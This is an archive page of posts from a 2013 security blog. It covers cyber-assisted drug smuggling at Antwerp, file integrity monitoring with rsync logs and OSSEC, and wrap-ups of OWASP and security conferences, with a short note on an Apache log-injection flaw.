Category Archives: Security

Crime Convergence

June 17, 2013 22:34 | Leave a Comment |

Convergence

Convergence isn’t a new fact in information security. For a while, we’re speaking about “security convergence” while two, at the beginning, distinct principles or functions are mixed to tend toward or achieve union or a common conclusion or result (as defined by Wikipedia). A good example is the combination of physical and logical security controls: to improve the authentication and authorization processes, we can use two different factors: something we “know” (a PIN, a password) and something we “have” (a token or smartcard). Security convergence is also used to detect incidents or suspicious activies. You could correlate data generated by a badge reader (physical security) with an Active Directory event (logical security). A user who swiped his badge to enter the building “A” but opening a session on a desktop located in the building “B” can be considered as suspicious.

Today, I read an interesting news reported on Twitter. It was published by the Dutch portal, transport-online.nl, which compiles news about freight. Nothing related with information security at first sight but quite interesting anyway. The portal reported that drug criminals hacked two containers terminals websites. Those companies operated in the port of Antwerp. Why? Today, computers control more and more infrastructures and containers are not an exception. Every container can be tracked throughout its journey: when it was (un)loaded on boats, trains or trucks. Where it was stored (position), etc. Such information can be very valuable for criminals, especially, if they contain drugs. Hackers used the infiltrated systems to locate their precious goods.

This is a very good example of “crime convergence“: To achieve their goals, criminals do not hesitate to mix regular crime activities with cyber-crime. I’m pretty sure that the two hacked companies would never have imagined to be a target for cyber criminals (“Hey, who will be interested by the position of our containers?“). Don’t forget that data handled by your organization might be very valuable for some people with bad intentions.

Here is a link to the article: Drugshandelaren hacken rederijen en ontvreemden containers met cocaïne (in Dutch – translation in English here).

 

Posted in: Security | Tagged: , ,

File Integrity Monitoring for the Poor

June 10, 2013 21:36 | 5 Comments |

Foo Network LogoFor most organizations, security has a huge impact on budgets… except if you’re called the NSA and must deploy a massive surveillance program! Every time you need money, you have to fight with your boss or finance guys to get some bucks after explaining why a new piece of software, appliance or consultant will help you to improve the security of their data. But sometimes, you can use data generated by non-security related solutions and extract some added value from them. When I say “non-security related“, it’s not 100% true, let me explain…

Even if information security is difficult to explain to the business, C-level people generally understand and agree on the need of backup systems. Ok, still today not all organizations have a strong backup procedure (and even less have a strong restore procedure!) but let’s assume it. Basically (I’m not a backup expert), there are two major ways to perform a backup. At the beginning of the week, we make a full backup on Monday and:

  • Perform an incremental backup every day (based on the full backup)
  • Or perform a delta backup every day (based on the yesterday’s backup)

The next Monday, a new full backup is performed and close the loop. Another very interesting tool to track changes on a server is a FIM (“File Integrity Monitor“). Such solution is helpful to detect suspicious changes in directories on a server. Classic examples of directories being controlled on a UNIX server are: /etc (where reside configuration files), /usr/bin & /usr/sbin (where reside system binaries). Usually, they don’t change often. But deploying a commercial FIM solution can be expensive. Idea: which kind of tools also scan filesystems for changes? Backup tools of course!

In my case, I’ve servers backuped every night via rsync to a central storage, rsync writes down to a file all the modified files synce the last backup. Why not parse this file and search for suspicious modifications? You could also process this file via Splunk and do some correlation or alerting on the indexed data. Finding a reference to /etc/passwd in my nightly rsync backup could be very suspicious if no new user was created by myself or another admin!

Conclusion: if you don’t have money, have ideas! Any data or logfile can be valuable and help you to increase your overall security.

Posted in: Security | Tagged: , ,

June 2013 OWASP Belgium Chapter Meeting Wrap-Up

June 6, 2013 22:04 | 3 Comments |

OWASP European Tour

I’m back from the last OWASP Belgium chapter meeting. Here is a quick wrap-up. Classic scenario, the event started with Seba who gave some updates about the OWASP foundation. Today’s event was part of a bigger one called the OWASP European Tour. During a few weeks, all European chapters organise a local event . There is also a CTF organised. Some interesting new projects where highlighted:

If you’re not an OWASP member yet, there is currently a cool action ongoing called “Membership drive“. Have a look at it. That’s the news for this time. Now, let’s review the scheduled talks.
The first speaker was Eoin Keary: “Needles in haystacks, we are not solving the app sec problem & html hacking the browser, CSP is dead“. Today it’s easy to find good examples of data breaches in your country. They can be used to demonstrate to your boss that security is more and more important. Why is it more easy to find examples? Due to the increasing amount of attacks (ex: from hacktivists). Most big organisations in the world have already been hacked even if they have huge security budgets. Is it normal? We spend a lot of money into security but the cost of security incidents increases too (huge business impact). “There’s money in them there is web apps” said Eoin. Every application is unique and therefore is not properly secured. Compared to networks which are more easy to configure, everybody talks TCP/IP and uses ports. Just put a firewall and you’re (almost) done. You can’t do the same with web apps. First Eoin’s conclusion is that we are doing it wrong. Nothing new but what is the problem?
Software Food Chain
According to Eoin, we are facing an asymmetric arms race: A cycle of an annual pentest gives minimal security and a pentest does not give any warranty of results. Web applications are too complex to be covered from A to Z. Think about 50 variables which could potentially be vulnerable to x CVE’s. It’s impossible to review all the test cases on a reasonable amount of time. Pentestng can be compared to the visible part of the iceberg. A pentester has “x” days to perform the tests while an attacker has plenty of. Also, are they as good as the bad guys? How experienced are they? When new code is pushed in production, vulnerabilities might be present until the next pentest (in weeks, months, years?). Are you sure that your testing tools don’t have security flaws or bugs too? Then Eoin gave examples of vulnerabilities that cannot be discovered by tools but by human intelligence (ex: business logic). The examples were based on abusing the CSP (“Content Security Policy“):
  • Single quote issue (HTML injection) quote damping?
  • Form rerouting
  • <base> jumping
  • Element override (<input> attribute in HTML5)
  • Hanging <textarea>
To resume: blackbox tests are useful to prove that applications are vulnerable but they are not the best way to secure an application (some risks remain). The only way is to perform code review. Eoin compared security with cheese burgers: they are tasty We know that they are bad for us but who cares?  We write insecure code until we get hacked! That is called the cheeseburger approach. Excellent talk, I liked it!
The second talk was “Teaching an old dog new tricks: securing development with PMD” by Justing Clarke. For a while, tools exist to search for bugs in software code. Some perform status analysis, others perform dynamic analysis. But tools used by developers are used to catch code code quality issue and address less (or not at all) security.
PMD Example
The idea explained by Justin was to extend existing solutions to perform security checks too? He focused on PMD. First, what is PMD? In the audience, only one guy was using this tool. It’s an open source static analyser for Java source code. It search for lot of bug but not really related to security. Justin’s presentation was about extending PMD with self-written security checks. It’s quite easy to extend… if you are a developer. Personaly, the talk went to deep for me. Custom rules are written as Xpath expressions. With my very basic knowledge, I found this like using grep to search for some patterns in the source code.
After a short break, the last guest, Aram Hoysepyan, talked about “Vulnerability prediction in Android applications“. Why? Android is an attractive target (75% of market share in Q1 2013) and the number of apps keeps growing. App security is not guaranteed by the platform provider (read: Google as example).
Vulnerability Prediction Model
So, a single vulnerability could affect a large amount of users and Android apps are not yet massively scanned (compared to regular application for PC/Mac). How to find vulnerabilities?
  • Code inspection
  • Penetration testing / security testing
  • Static code analysis
  • With some “magic” – vulnerability prediction models!
That’s what is doing Aram. This work by using a “magic ball” as he defines it (machine learning). The model will not say “this line of code is dangerous” but “have a look at this file, it might be suspicious“. What are the existing tools & techniques?
  • Size of a component (large components are more likely to be vulnerable)
  • Fetch the features from the components
  • Determine the vulnerabilities (there exists public database MFSA or National Vulne DB)
  • Investigate the correlation
Some other interesting points to keep an eye on:
  • Developer activity
  • Number of import statements
What’s the approach used by Aram? Use the source code itself in a tokenised form. Use the token frequency as features. Static code analysis is performed using Fortify. Each file is either clean or vulnerable. Tokens and vulnerabilities are used to build a prediction model (learning machine). Experiment #1: Can we predict a future version of an app based on its first version? Experiment #2: Can we build a generalised predictor that works on all apps? Based on the results, what are the most influential features?
  • Error handling
  • “if” (branching – app complexity)
  • Null (pointer algebra)
  • Java, org (import statements)
  • New, Log (others)
Conclusions: it worked quite fine for java files in android apps but they are now trying to implement the same technique with FireFox and PHP code. The presentation started with interesting ideas but slides after slides it became more complex and fuzzy. Again, I’m not a developer. That’s all for this time!
Posted in: Belgium, Event, Security | Tagged: , , ,

Logs: For Better or For Worse?

June 3, 2013 15:09 | 6 Comments |

SanitizationLast week, a vulnerability regarding Apache was disclosed. More precisely, the issue was located on the mod_rewrite module. This module rewrites (now, you understand its name) URLs on the fly. This is very useful during web page migrations, attacks migitations etc. The security flaw does not affect the core feature of this module but the way it writes events in the Apache log file. The output is not properly sanitized and could allow the execution of arbitrary commands if the logs are displayed in a terminal emulator. This is not the first time that log files are vulnerable to command injections. Another product affected by this issue was Fail2ban in 2012 (CVE-2012-5642).

Read More →

Posted in: Logs Management / SIEM, Security | Tagged: , ,

SOURCE Dublin Wrap-Up Day #2

May 24, 2013 18:30 | 3 Comments |

SOURCE Kit

I’m writing this wrap-up from the Dublin airport, waiting my flight back to Belgium. This new edition of SOURCE is already over. What did we learn today?

Read More →

Posted in: Event, Security | Tagged: , , ,

SOURCE Dublin Wrap-Up Day #1

May 24, 2013 08:20 | 3 Comments |

IMG 3217

I flew on Wednesday evening to Dublin, Ireland to attend the SOURCE conference (previously, it was organised in Barcelona). The conference was held in the Trinity College, in the centre of the city. This is a really nice place where we slept in student bedrooms (a “kot” like we say in Belgium), this reminded my good old years as a student. Nice atmosphere!
Posted in: Event, Security | Tagged: , , ,

NoSuchCon #1 Wrap-Up

May 17, 2013 21:42 | 16 Comments |

NoSuchCon Kit

There are so many security conferences around the world… Some people already debated about this: Is it better to restrict the annual agenda to well-known events or let people start their own? IMHO, we need initiatives like this. It’s good to have a broad agenda with local conferences where local people can attend without spending huge amounts of money for travels and lodging (If you can go to conferences, let’s bring the conferences to you!) So, let’s welcome the newly born conference called “NoSuchCon“. The first edition was just organized in Paris across the last three days. Unfortunately, I was only able to attend the last day… If only I could expand my holidays like a filesystem! :-) I joined Paris early the morning to attend the first keynote. Here is a quick review of the day.

Read More →

Posted in: Event, Security | Tagged: , ,

Improving File Integrity Monitoring with OSSEC

May 13, 2013 16:00 | 15 Comments |

File Integrity ErrorFIM or “File Integrity Monitoring” can be defined as the process of validating the integrity of operating system and applications files with a verification method using a hashing algorythm like MD5 or SHA1 and then comparing the current file state with a baseline. A hash will allow the detection of files content modification but other information can be checked too: owner, permissions, modification time. Implemeting file integrity monitoring is a very good way to detect compromized servers. Not only operating system files can be monitored (/etc on UNIX, registry on Windows, share libraries, etc) but also applications (monitoring your index.php or index.html can reveal a defaced website).

During its implementation, a file integrity monitoring project may face two common issues:

  • The baseline used to be compared with the current file status must of course be trusted. To achieve this, it must be stored on a safe place where attacker cannot detect it and cannot alter it!
  • The process must be fine tuned to react only on important changes otherwise they are two risks: The real suspicious changes will be hidden in the massive flow of false-positives. People in charge of the control could miss interesting changes.

There are plenty of tools which implement FIM, commercial as well as free. My choice went to OSSEC for a while. My regular followers know that I already posted lot of articles about it. I also contributed to the project with a patch to add Geolocatization to alerts. This time, I wrote another patch to improve the file integraty monitoring feature of OSSEC.

Read More →

Posted in: OSSEC, Security, Software | Tagged: , , , ,

Mine is Bigger Than Yours!

May 6, 2013 21:08 | 2 Comments |

Mine Is Bigger Than YoursEverybody already faced the same situation: Children like to compare with each others! Put kids in the same room and let them play. Comparisons will start soon: “My dad has a bigger car than yours“, “My plane flies better than yours“, “I can run faster than you“, etc. Sometimes, I’m feeling exactly the same during conversations about infosec products and I’m pissed of this. My opinion is that infosec people also tend to be proud of their security solutions and compare them to others. Like in a kindergarten…

It’s a fact, humans don’t like to assume their errors. It’s not easy to concede a bad choice and say that your security solution does not fullfill its job. But why pretend to have the top-notch-killer-device on the other side?  Remember, years ago, the flame war between Linux and Windows users? (Honestly, I took part of this game when I was young)

Sometimes, colleagues or customers ask me what’s the best choice between “x” or “y“. It’s always difficult for me to answer such questions in a cold start situation. First of all because most of the time, I don’t have enough background to compare them. Of course, the market is full of studies and analyses like the well-known Gartner magic-quadrant. Those can help you to make a first selection. Some vendors ask research firms to make a comparison of their product with direct competitors. If they “asked“, it means they also “paid” for these researches. In a customer – supplier relation, the customer must be happy. May we be certain that the results of the study are fully independent? I’m in doubt…

Personally, the best solution is the one which will solve YOUR issue and match YOUR requirements in terms of:

  • Budget
  • Features
  • Integration in your environment
  • Management & Support

Keep in mind that your information security is a big market place where all vendors would like their share of the cake… Select two or three solutions, ask for live demos, setup a PoC (“Proof of Concept“). This could cost time and money but you will have all keys in your hand to make the right decision. Don’t buy a brand, buy a solution!

 

Posted in: Security, Uncategorized | Tagged: ,

BSidesLondon 2013 Wrap-Up

April 24, 2013 22:40 | 7 Comments |

BSidesLondon Venue

This was already the third edition of BSidesLondon today! Time flies! Being busy yesterday, I just reached London in the morning and arrived just in time for the administrative tasks (registration, pick-up a t-shirt, goodies), grabbing some coffee and shaking some hands. BSidesLondon is definitively growing in size and quality: A huge number of attendees, two tracks, a rookie track, a job fair, workshops and lightning talks. Even the sun was present over London, no fog at all! Two tracks means you have to make choices! Here is the brief overview of my schedule.

Read More →

Posted in: Event, Security | Tagged: , , ,